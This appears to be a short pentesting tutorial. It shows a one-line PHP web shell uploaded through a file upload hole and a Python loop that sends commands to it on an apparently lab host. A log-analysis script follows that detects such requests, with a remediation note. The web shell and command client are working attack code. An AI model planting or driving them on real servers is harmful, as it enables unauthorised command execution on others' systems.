Simple terminal in Python

Suppose you are pentesting a web app, have found a file upload vulnerability, and have successfully uploaded a PHP file with this content:

<?php echo shell_exec($_GET['cmd']); ?>

Every time you need to execute a command to find out more about the system that hosts the web app, you may need to do something like this:

The result may seem difficult to read.

I am writing some Python code that simply prints the results to the terminal. The code looks like this:

import requests

# Change this URL to wherever your <?php echo shell_exec($_GET['cmd']); ?> file was uploaded.
url = "http://10.10.10.6/torrent/upload/194c4c7e769cc2a5bb902d6d40a8c34238cf4a22.php"

try:
    while True:
        cmd = input("> ")
        # params= puts cmd in the query string, which PHP exposes as $_GET['cmd'] even on a POST.
        response = requests.post(url, params={"cmd": cmd})
        print(response.text)
except KeyboardInterrupt:
    print("bye!")

The result looks like this.

This is not a shell; it is simply the command's output echoed back by PHP's shell_exec, displayed in the terminal instead of in the browser.
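
The requests this script sends leave a clear trace on the server, because the command travels in the query string and is written to the access log. As an added example (not part of the original post), the following flags requests that execute a script inside an upload directory; the log lines, the file name example.php and the /upload/ path prefix are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = '''\
10.10.14.3 - - [12/Mar/2024:10:01:02 +0000] "POST /torrent/upload/example.php?cmd=id HTTP/1.1" 200 54 "-" "python-requests/2.31.0"
10.10.14.3 - - [12/Mar/2024:10:01:09 +0000] "POST /torrent/upload/example.php?cmd=uname+-a HTTP/1.1" 200 112 "-" "python-requests/2.31.0"
192.168.1.20 - - [12/Mar/2024:10:02:00 +0000] "GET /torrent/upload/poster.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.168.1.20 - - [12/Mar/2024:10:02:05 +0000] "GET /torrent/index.php?mode=browse HTTP/1.1" 200 9133 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
SCRIPT_EXT = (".php", ".phtml", ".phar")  # extensions a PHP host may execute
CMD_PARAMS = {"cmd"}                      # parameter name used on this page


def find_suspicious(log_text, upload_dirs=("/upload/",)):
    """Return (ip, path, command, reasons) for script requests inside upload dirs."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        path = url.path.lower()
        # Uploaded content should be served as static files, never executed.
        if not (any(d in path for d in upload_dirs) and path.endswith(SCRIPT_EXT)):
            continue
        reasons = ["script executed from upload directory"]
        query = parse_qs(url.query, keep_blank_values=True)
        cmd = next((query[p][0] for p in CMD_PARAMS if p in query), None)
        if cmd is not None:
            reasons.append("command parameter in query string")
        if m["ua"].lower().startswith("python-requests"):
            reasons.append("scripted HTTP client")
        hits.append((m["ip"], url.path, cmd, reasons))
    return hits


if __name__ == "__main__":
    for ip, path, cmd, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {path} cmd={cmd!r}: {'; '.join(reasons)}")
```

Detection of this kind only catches the activity after the fact. The durable fix is to validate uploads and configure the web server so that nothing in the upload directory is executed as a script.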
